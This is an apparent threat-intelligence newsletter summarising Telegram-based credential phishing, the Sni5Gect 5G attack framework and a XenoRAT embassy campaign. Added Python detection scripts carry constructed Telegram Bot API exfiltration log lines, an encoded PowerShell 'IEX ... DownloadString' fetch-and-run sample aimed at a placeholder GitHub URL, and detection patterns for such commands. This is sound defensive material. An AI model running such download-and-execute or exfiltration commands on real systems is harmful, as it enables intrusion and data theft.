TRENDING TOPICS AUG 19, 2025

Phishing Campaigns Exploiting Telegram for Stealth and Data Theft  

Recent reports indicate that cybercriminals are increasingly using Telegram as a covert communication and exfiltration channel, underscoring its growing role in phishing and malware campaigns. In recent attacks, attackers deployed highly convincing fake government login portals that intercepted credentials and transmitted them in real time via the Telegram Bot API. These phishing sites often included pre-filled government email addresses and deceptive security notices to manipulate trust and create a sense of urgency, while some samples redirected victims to legitimate Microsoft pages after data theft to mask the compromise. tLab’s Anti-APT platform identified these threats through OCR, heuristic analysis, and behavioral monitoring, allowing detection within seconds and showing how automation can counter advanced credential theft. This case highlights how trusted services, including Telegram and third-party platforms, are being repurposed by threat actors to evade defenses while maintaining persistent access to sensitive accounts. Phishing lures have shifted from fake AI tools to copyright violation notices, tailored with reconnaissance-based details, including company ownership records and Facebook Page IDs, to increase believability. Telegram once again plays a central role, this time as a dead drop resolver that points to payload-hosting servers, making takedown and detection more difficult. Beyond its current ability to steal browser credentials and system data, the malware’s ongoing development suggests expanded capabilities, including screenshot capture, keylogging, and file encryption. These campaigns reveal a clear trend: adversaries are refining phishing techniques with precision and social engineering, and weaponizing trusted platforms to conceal malicious traffic, making it more challenging for enterprises and governments to defend against modern data theft operations.
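The exfiltration path described above (a phishing kit's server-side handler posting stolen credentials to the Telegram Bot API) leaves a distinctive trace in egress proxy logs. The following detection logic is an added example, not code from the page or from tLab: it scans constructed proxy log lines for non-browser calls to api.telegram.org send methods and redacts the bot token before reporting. The log format, hosts and token values are all assumptions.

```python
import re
from typing import Dict, List

# Constructed proxy log lines (not from the original page): client, method, URL, referrer, user agent.
# The second and fourth lines are what a phishing kit's server-side handler looks like when it
# forwards captured form fields to a Telegram bot; the token values are made-up placeholders.
SAMPLE_PROXY_LOG = """\
10.0.4.21 GET https://web.telegram.org/a/ - browser
10.0.4.21 POST https://api.telegram.org/bot1234567890:AAExampleTokenXYZ/sendMessage - curl/8.4
10.0.9.7 GET https://login.microsoftonline.com/common/oauth2/v2.0/authorize - browser
10.0.4.33 POST https://api.telegram.org/bot9876543210:BBAnotherTokenQRS/sendDocument - python-requests/2.32
"""

# Telegram Bot API calls have the shape https://api.telegram.org/bot<id>:<secret>/<method>
BOT_API = re.compile(r"https?://api\.telegram\.org/bot(?P<token>[0-9]+:[A-Za-z0-9_-]+)/(?P<method>\w+)")
# Methods that carry data out of the network; the Telegram client itself never calls these.
EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}

def redact(token: str) -> str:
    """Keep the numeric bot id (useful for takedown requests) and hide the secret part."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:2]}...[redacted]"

def find_bot_api_exfil(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per proxy log line that calls a Telegram Bot API send method."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        src, _http_method, url, _referrer, agent = parts[:5]
        m = BOT_API.search(url)
        if not m or m.group("method") not in EXFIL_METHODS:
            continue
        findings.append({
            "src": src,
            "method": m.group("method"),
            "bot_id": redact(m.group("token")),
            "agent": agent,
            "reason": "internal host calling Telegram Bot API send method",
        })
    return findings

if __name__ == "__main__":
    for finding in find_bot_api_exfil(SAMPLE_PROXY_LOG):
        print(finding)
```

Alerting on the bot id rather than the full token keeps secrets out of the SIEM while still giving the abuse report to Telegram something to act on.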

Sni5Gect Framework Exposes Major Flaws in 5G Security  

Researchers from Singapore University of Technology and Design have unveiled Sni5Gect, a groundbreaking framework that intercepts and manipulates 5G communications without the need for rogue base stations. Traditional 5G attacks typically rely on expensive, complex, and easily detectable fake infrastructure, but Sni5Gect operates as a silent observer that eavesdrops on legitimate traffic during the pre-authentication phase. This vulnerable window occurs when devices reconnect after leaving airplane mode, exiting tunnels, or regaining coverage, leaving control-plane messages unencrypted and open to exploitation. Using standard software-defined radios, the system can monitor traffic with an accuracy of more than 80% and inject malicious payloads at success rates between 70% and 90%, even from distances of up to 20 meters. The framework is modular, consisting of components for synchronization, system information extraction, device tracking, and spoofed message injection, allowing it to mimic real base station communications with alarming precision. Testing on commercial 5G smartphones from brands including Samsung, Google, Huawei, and OnePlus revealed multiple attack scenarios with severe real-world consequences. These include one-shot attacks that instantly crash devices, response-based attacks that fingerprint and track users, and a novel multi-stage downgrade method that forces devices off 5G and locks them into less secure 4G connectivity. Researchers also showed how Sni5Gect could extract sensitive identity data, expanding the potential for surveillance and fraud. The GSM Association has acknowledged the severity of these findings under coordinated disclosure, assigning CVD-2024-0096 to track the vulnerabilities. While chipmakers have issued patches for past 5G flaws, the emergence of this new method illustrates that attackers no longer need full rogue networks to compromise mobile devices. By releasing the framework as an open-source research tool, the team aims to equip defenders with a means to test and harden 5G networks. However, its practicality and low cost raise serious concerns about potential misuse. This development underscores the urgent need for proactive security measures as 5G becomes deeply integrated into global critical infrastructure.

Espionage Campaign Targets Embassies in South Korea with XenoRAT 

A state-sponsored campaign uncovered by Trellix researchers has been targeting foreign embassies in South Korea with highly tailored spearphishing emails that deliver the stealthy XenoRAT malware. Active since March 2025, the operation has launched at least 19 attacks against diplomatic missions, evolving through multiple phases that shifted lures from European political meetings to U.S.–Korea military alliance themes. The emails were multilingual—crafted in English, Korean, French, Russian, Persian, and Arabic—and timed to coincide with real-world events, which made them especially convincing. Attackers used password-protected archives hosted on trusted services, including Dropbox and Google Drive, which contained .LNK shortcut files disguised as PDFs. When opened, these triggered obfuscated PowerShell scripts to fetch XenoRAT payloads from GitHub or Dropbox, establishing persistence through scheduled tasks while evading many email security filters. XenoRAT offers advanced espionage capabilities, including keystroke logging, screen and webcam capture, file exfiltration, and remote shell execution. Its use of reflection-based memory loading and Confuser Core obfuscation makes it resilient against detection and analysis. While attribution points to North Korea’s Kimsuky group (APT43), time zone activity and holiday pauses suggest potential Chinese involvement, raising the possibility of joint or state-sponsored cooperation. Importantly, the tactics used—phishing tied to real-world diplomatic events, abuse of widely trusted cloud platforms, and GitHub-based malware hosting—are not geographically restricted. The same methods could easily be adapted to target embassies and diplomatic staff in other regions, including Europe and the United States, particularly around key events such as political summits, trade negotiations, or military discussions. This demonstrates how an operation initially centered on Seoul can scale globally, posing risks to Western governments and organizations that hold high-value diplomatic, military, or policy information.
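The delivery chain above (a double-clicked shortcut spawning PowerShell, which fetches its payload from GitHub or Dropbox) can be scored from endpoint process-creation telemetry. The scoring logic below is an added example, not code from the page or from Trellix: it decodes a PowerShell -EncodedCommand argument and checks the decoded script for download-and-run cmdlets and the cloud hosts named in the report. The event field names, paths and URL are assumptions, and the sample events are constructed.

```python
import base64
import re

# Indicators for the chain the report describes: explorer.exe (user opened the .lnk) -> powershell.exe
# with an encoded command -> download-and-run from GitHub/Dropbox. Patterns are assumptions, not Trellix's.
DOWNLOAD_PATTERNS = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression", re.I)
HOSTING_DOMAINS = re.compile(r"raw\.githubusercontent\.com|github\.com|dropbox(?:usercontent)?\.com", re.I)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None if absent or invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev: dict) -> list:
    """Reasons a process-creation event matches the chain; an empty list means no match."""
    reasons = []
    if not ev["image"].lower().endswith("powershell.exe"):
        return reasons
    if ev["parent_image"].lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (double-clicked shortcut)")
    decoded = decode_encoded_command(ev["command_line"])
    if decoded:
        reasons.append("encoded command line")
    script = decoded or ev["command_line"]  # inspect the decoded script when there is one
    if DOWNLOAD_PATTERNS.search(script):
        reasons.append("download-and-execute cmdlet")
    if HOSTING_DOMAINS.search(script):
        reasons.append("payload host is GitHub/Dropbox")
    return reasons

def _encode(ps: str) -> str:  # builds the constructed sample below with the encoding PowerShell expects
    return base64.b64encode(ps.encode("utf-16-le")).decode()

# Constructed events (not from the Trellix report); the URL and file paths are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -w hidden -enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EXAMPLE/x/s.ps1')")},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -File C:\ProgramData\inventory.ps1"},
]
```

Three or more reasons on one event is a reasonable alert threshold; the benign scheduled-script event scores zero because its parent, encoding and hosts all differ.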

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.